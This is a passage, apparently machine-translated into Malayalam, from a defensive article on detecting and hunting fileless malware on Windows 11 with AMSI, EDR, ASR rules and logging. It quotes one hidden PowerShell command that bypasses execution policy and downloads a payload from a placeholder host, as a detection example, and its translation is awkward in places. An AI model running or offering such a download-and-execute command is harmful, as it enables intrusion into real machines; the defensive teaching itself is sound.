പ്രാദേശിക പശ്ചാത്തലമുള്ള ഒരു ഏജന്റിന് കഴിവുള്ളത് നിർത്തി പിന്നോട്ട് മാറ്റുക SIEM-നെയോ ഇമെയിൽ/SMS വഴിയോ അറിയിക്കുന്നതിനു പുറമേ, മാനുവൽ ഇടപെടലില്ലാതെയുള്ള ക്ഷുദ്രകരമായ പ്രവർത്തനം. ചില ഉൽപ്പന്നങ്ങൾ ഒരു റൂട്ട് കോസ് ആട്രിബ്യൂഷൻ ലെയർ (സ്റ്റോറിലൈൻ-ടൈപ്പ് മോഡലുകൾ) ചേർക്കുന്നു, ഇത് ദൃശ്യമായ പ്രക്രിയയിലേക്ക് (ഔട്ട്‌ലുക്ക്/വേഡ്) വിരൽ ചൂണ്ടുന്നില്ല, മറിച്ച് പൂർണ്ണമായ ക്ഷുദ്രകരമായ ത്രെഡ് സിസ്റ്റത്തെ സമഗ്രമായി വൃത്തിയാക്കുന്നതിനാണ് അതിന്റെ ഉത്ഭവം.

ശ്രദ്ധിക്കേണ്ട ഒരു സാധാരണ കമാൻഡ് പാറ്റേൺ ഇതുപോലെയായിരിക്കാം: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');യുക്തി കൃത്യമായ സ്ട്രിംഗ് അല്ല, പക്ഷേ സിഗ്നലുകളുടെ കൂട്ടം: പോളിസി ബൈപാസ്, മറച്ച വിൻഡോ, ക്ലിയർ ഡൗൺലോഡ്, ഇൻ-മെമ്മറി എക്സിക്യൂഷൻ.

എ.എം.എസ്.ഐ, പൈപ്പ്‌ലൈൻ, ഓരോ നടന്റെയും പങ്ക്: അവസാന പോയിന്റ് മുതൽ എസ്.ഒ.സി വരെ

സ്ക്രിപ്റ്റ് ക്യാപ്ചറിനപ്പുറം, അന്വേഷണവും പ്രതികരണവും സുഗമമാക്കുന്ന ഘട്ടങ്ങൾ ഒരു ശക്തമായ ആർക്കിടെക്ചർ സംഘടിപ്പിക്കുന്നു. ലോഡ് നടപ്പിലാക്കുന്നതിന് മുമ്പ് കൂടുതൽ തെളിവുകൾ ഉണ്ടെങ്കിൽ, നല്ലത്., മികച്ചത്.

• സ്ക്രിപ്റ്റ് ഇന്റർസെപ്ഷൻഒരു മാൽവെയർ പൈപ്പ്‌ലൈനിൽ സ്റ്റാറ്റിക്, ഡൈനാമിക് വിശകലനത്തിനായി AMSI ഉള്ളടക്കം (അത് പെട്ടെന്ന് സൃഷ്ടിക്കപ്പെട്ടതാണെങ്കിൽ പോലും) നൽകുന്നു.
• പ്രോസസ്സ് ഇവന്റുകൾPID-കൾ, ബൈനറികൾ, ഹാഷുകൾ, റൂട്ടുകൾ, മറ്റ് ഡാറ്റ എന്നിവ ശേഖരിക്കുന്നു. ആർഗ്യുമെന്റുകൾ, അന്തിമ ലോഡിലേക്ക് നയിച്ച പ്രോസസ് ട്രീകൾ സ്ഥാപിക്കുന്നു.
• കണ്ടെത്തലും റിപ്പോർട്ടിംഗുംകണ്ടെത്തലുകൾ ഉൽപ്പന്ന കൺസോളിൽ പ്രദർശിപ്പിക്കുകയും കാമ്പെയ്‌ൻ ദൃശ്യവൽക്കരണത്തിനായി നെറ്റ്‌വർക്ക് പ്ലാറ്റ്‌ഫോമുകളിലേക്ക് (NDR) കൈമാറുകയും ചെയ്യുന്നു.
• ഉപയോക്തൃ ഗ്യാരണ്ടികൾഒരു സ്ക്രിപ്റ്റ് മെമ്മറിയിലേക്ക് കുത്തിവച്ചാലും, ഫ്രെയിംവർക്ക് എ.എം.എസ്.ഐ അത് തടയുന്നു അനുയോജ്യമായ വിൻഡോസ് പതിപ്പുകളിൽ.
• അഡ്മിനിസ്ട്രേറ്റർ കഴിവുകൾ: സ്ക്രിപ്റ്റ് പരിശോധന പ്രാപ്തമാക്കുന്നതിനുള്ള നയ കോൺഫിഗറേഷൻ, പെരുമാറ്റത്തെ അടിസ്ഥാനമാക്കിയുള്ള തടയൽ കൺസോളിൽ നിന്ന് റിപ്പോർട്ടുകൾ സൃഷ്ടിക്കൽ.
• എസ്‌ഒസി വർക്ക്: ചരിത്രം പുനഃസൃഷ്ടിക്കുന്നതിനായി ആർട്ടിഫാക്‌റ്റുകളുടെ (VM UUID, OS പതിപ്പ്, സ്‌ക്രിപ്റ്റ് തരം, ഇനീഷ്യേറ്റർ പ്രോസസ്സും അതിന്റെ പാരന്റും, ഹാഷുകളും കമാൻഡ് ലൈനുകളും) വേർതിരിച്ചെടുക്കൽ, കൂടാതെ ലിഫ്റ്റ് നിയമങ്ങൾ ഭാവി.

പ്ലാറ്റ്‌ഫോം എപ്പോൾ കയറ്റുമതി ചെയ്യാൻ അനുവദിക്കുന്നു മെമ്മറി ബഫർ നിർവ്വഹണവുമായി ബന്ധപ്പെട്ട്, ഗവേഷകർക്ക് പുതിയ കണ്ടെത്തലുകൾ സൃഷ്ടിക്കാനും സമാന വകഭേദങ്ങൾക്കെതിരായ പ്രതിരോധം സമ്പന്നമാക്കാനും കഴിയും.

വിൻഡോസ് 11 ലെ പ്രായോഗിക നടപടികൾ: പ്രതിരോധവും വേട്ടയാടലും

മെമ്മറി പരിശോധനയും AMSI-യും ഉള്ള EDR ഉള്ളതിന് പുറമേ, Windows 11 നിങ്ങളെ ആക്രമണ ഇടങ്ങൾ അടയ്ക്കാനും ദൃശ്യപരത മെച്ചപ്പെടുത്താനും അനുവദിക്കുന്നു നേറ്റീവ് നിയന്ത്രണങ്ങൾ.

• പവർഷെല്ലിലെ രജിസ്ട്രേഷനും നിയന്ത്രണങ്ങളുംസ്ക്രിപ്റ്റ് ബ്ലോക്ക് ലോഗിംഗും മൊഡ്യൂൾ ലോഗിംഗും പ്രാപ്തമാക്കുന്നു, സാധ്യമാകുന്നിടത്തെല്ലാം നിയന്ത്രിത മോഡുകൾ പ്രയോഗിക്കുന്നു, കൂടാതെ ഉപയോഗം നിയന്ത്രിക്കുന്നു ബൈപാസ്/മറച്ചത്.
• ആക്രമണ ഉപരിതല കുറവ് (ASR) നിയമങ്ങൾ: ഓഫീസ് പ്രക്രിയകൾ വഴിയുള്ള സ്ക്രിപ്റ്റ് ലോഞ്ചുകൾ തടയുന്നു കൂടാതെ WMI ദുരുപയോഗംആവശ്യമില്ലാത്തപ്പോൾ /PSExec.
• ഓഫീസ് മാക്രോ നയങ്ങൾ: ഡിഫോൾട്ടായി ഇന്റേണൽ മാക്രോ സൈനിംഗും കർശനമായ ട്രസ്റ്റ് ലിസ്റ്റുകളും പ്രവർത്തനരഹിതമാക്കുന്നു; ലെഗസി DDE ഫ്ലോകൾ നിരീക്ഷിക്കുന്നു.
• WMI ഓഡിറ്റും രജിസ്ട്രിയും: ഇവന്റ് സബ്‌സ്‌ക്രിപ്‌ഷനുകളും ഓട്ടോമാറ്റിക് എക്സിക്യൂഷൻ കീകളും (റൺ, റൺഓൺസ്, വിൻലോഗൺ) നിരീക്ഷിക്കുന്നു, അതുപോലെ ടാസ്‌ക് സൃഷ്‌ടിയും. ഷെഡ്യൂൾ ചെയ്‌തു.
• സ്റ്റാർട്ടപ്പ് പരിരക്ഷ: സെക്യുർ ബൂട്ട് സജീവമാക്കുന്നു, MBR/EFI സമഗ്രത പരിശോധിക്കുന്നു, സ്റ്റാർട്ടപ്പിൽ മാറ്റങ്ങളൊന്നുമില്ലെന്ന് സാധൂകരിക്കുന്നു.
• പാച്ചിംഗും കാഠിന്യവും: ബ്രൗസറുകൾ, ഓഫീസ് ഘടകങ്ങൾ, നെറ്റ്‌വർക്ക് സേവനങ്ങൾ എന്നിവയിലെ ചൂഷണം ചെയ്യാവുന്ന ദുർബലതകൾ അടയ്ക്കുന്നു.
• അവബോധം: ഫിഷിംഗിലും സിഗ്നലുകളിലും ഉപയോക്താക്കളെയും സാങ്കേതിക ടീമുകളെയും പരിശീലിപ്പിക്കുന്നു രഹസ്യ വധശിക്ഷകൾ.

വേട്ടയാടലിനായി, ഇനിപ്പറയുന്നവയെക്കുറിച്ചുള്ള ചോദ്യങ്ങളിൽ ശ്രദ്ധ കേന്ദ്രീകരിക്കുക: പവർഷെൽ/എംഎസ്എച്ച്ടിഎയ്‌ക്കെതിരെ ഓഫീസ് പ്രക്രിയകൾ സൃഷ്ടിക്കുന്നു, വാദങ്ങൾക്കൊപ്പം ഡൗൺലോഡ്സ്ട്രിംഗ്/ഡൗൺലോഡ് ഫയൽവ്യക്തമായ അവ്യക്തത, പ്രതിഫലന കുത്തിവയ്പ്പുകൾ, സംശയാസ്പദമായ TLD-കളിലേക്ക് ഔട്ട്ബൗണ്ട് നെറ്റ്‌വർക്കുകൾ എന്നിവയുള്ള സ്ക്രിപ്റ്റുകൾ. ശബ്‌ദം കുറയ്ക്കുന്നതിന് പ്രശസ്തിയും ആവൃത്തിയും ഉപയോഗിച്ച് ഈ സിഗ്നലുകളെ ക്രോസ്-റഫറൻസ് ചെയ്യുക.

ഇന്ന് ഓരോ എഞ്ചിനും എന്ത് കണ്ടെത്താനാകും?

മൈക്രോസോഫ്റ്റിന്റെ എന്റർപ്രൈസ് സൊല്യൂഷനുകൾ AMSI, ബിഹേവിയറൽ അനലിറ്റിക്സ്, മെമ്മറി പരിശോധിക്കുക ബൂട്ട് സെക്ടർ സംരക്ഷണം, ഉയർന്നുവരുന്ന ഭീഷണികൾക്കെതിരെ സ്കെയിൽ ചെയ്യുന്നതിനായി ക്ലൗഡ് അധിഷ്ഠിത ML മോഡലുകൾ. മറ്റ് വെണ്ടർമാർ മാറ്റങ്ങളുടെ യാന്ത്രിക റോൾബാക്ക് ഉപയോഗിച്ച് ദോഷകരവും ദോഷകരവുമായ സോഫ്റ്റ്‌വെയറിനെ വേർതിരിച്ചറിയാൻ കേർണൽ-ലെവൽ നിരീക്ഷണം നടപ്പിലാക്കുന്നു.

അടിസ്ഥാനമാക്കിയുള്ള ഒരു സമീപനം വധശിക്ഷാ കഥകൾ ഇത് മൂലകാരണം തിരിച്ചറിയാൻ നിങ്ങളെ അനുവദിക്കുന്നു (ഉദാഹരണത്തിന്, ഒരു ശൃംഖല പ്രവർത്തനക്ഷമമാക്കുന്ന ഒരു ഔട്ട്‌ലുക്ക് അറ്റാച്ച്‌മെന്റ്) കൂടാതെ മുഴുവൻ ട്രീയെയും ലഘൂകരിക്കുന്നു: സ്ക്രിപ്റ്റുകൾ, കീകൾ, ടാസ്‌ക്കുകൾ, ഇന്റർമീഡിയറ്റ് ബൈനറികൾ, ദൃശ്യമായ ലക്ഷണത്തിൽ കുടുങ്ങിപ്പോകുന്നത് ഒഴിവാക്കുന്നു.

സാധാരണ തെറ്റുകളും അവ എങ്ങനെ ഒഴിവാക്കാം എന്നതും

ഒരു ബദൽ മാനേജ്മെന്റ് പ്ലാൻ ഇല്ലാതെ പവർഷെൽ തടയുന്നത് അപ്രായോഗികം മാത്രമല്ല, വേറെയും ഉണ്ട് പരോക്ഷമായി അത് വിളിക്കാനുള്ള വഴികൾമാക്രോകൾക്കും ഇത് ബാധകമാണ്: ഒന്നുകിൽ നിങ്ങൾ അവ നയങ്ങളും ഒപ്പുകളും ഉപയോഗിച്ച് കൈകാര്യം ചെയ്യുക, അല്ലെങ്കിൽ ബിസിനസ്സ് ബാധിക്കപ്പെടും. ടെലിമെട്രിയിലും പെരുമാറ്റ നിയമങ്ങളിലും ശ്രദ്ധ കേന്ദ്രീകരിക്കുന്നതാണ് നല്ലത്.

ആപ്ലിക്കേഷനുകൾ വൈറ്റ്‌ലിസ്റ്റ് ചെയ്യുന്നത് എല്ലാം പരിഹരിക്കുമെന്ന് വിശ്വസിക്കുന്നതാണ് മറ്റൊരു പൊതു തെറ്റ്: ഫയലില്ലാത്ത സാങ്കേതികവിദ്യ ഇതിനെ കൃത്യമായി ആശ്രയിച്ചിരിക്കുന്നു. വിശ്വസനീയമായ ആപ്പുകൾനിയന്ത്രണം അവർ എന്താണ് ചെയ്യുന്നതെന്നും അവർ എങ്ങനെ ബന്ധപ്പെട്ടിരിക്കുന്നുവെന്നും നിരീക്ഷിക്കണം, അവർക്ക് അനുവാദമുണ്ടോ എന്ന് മാത്രമല്ല.

മുകളിൽ പറഞ്ഞവയെല്ലാം കണക്കിലെടുക്കുമ്പോൾ, യഥാർത്ഥത്തിൽ എന്താണ് പ്രധാനമെന്ന് നിങ്ങൾ നിരീക്ഷിക്കുമ്പോൾ ഫയലില്ലാത്ത മാൽവെയർ ഒരു "പ്രേതം" ആകുന്നത് അവസാനിപ്പിക്കുന്നു: പെരുമാറ്റം, ഓർമ്മ, ഉത്ഭവം ഓരോ എക്സിക്യൂഷന്റെയും. AMSI, റിച്ച് പ്രോസസ് ടെലിമെട്രി, നേറ്റീവ് വിൻഡോസ് 11 നിയന്ത്രണങ്ങൾ, പെരുമാറ്റ വിശകലനത്തോടുകൂടിയ ഒരു EDR ലെയർ എന്നിവ സംയോജിപ്പിക്കുന്നത് നിങ്ങൾക്ക് നേട്ടം നൽകുന്നു. മാക്രോകൾക്കും പവർഷെല്ലിനും വേണ്ടിയുള്ള റിയലിസ്റ്റിക് നയങ്ങൾ, കമാൻഡ് ലൈനുകൾക്കും പ്രോസസ്സ് ട്രീകൾക്കും മുൻഗണന നൽകുന്ന WMI/രജിസ്ട്രി ഓഡിറ്റിംഗ്, ഹണ്ടിംഗ് എന്നിവ സമവാക്യത്തിലേക്ക് ചേർക്കുക, ഈ ശൃംഖലകൾ ശബ്‌ദം പുറപ്പെടുവിക്കുന്നതിന് മുമ്പ് അവ മുറിക്കുന്ന ഒരു പ്രതിരോധം നിങ്ങൾക്കുണ്ടാകും.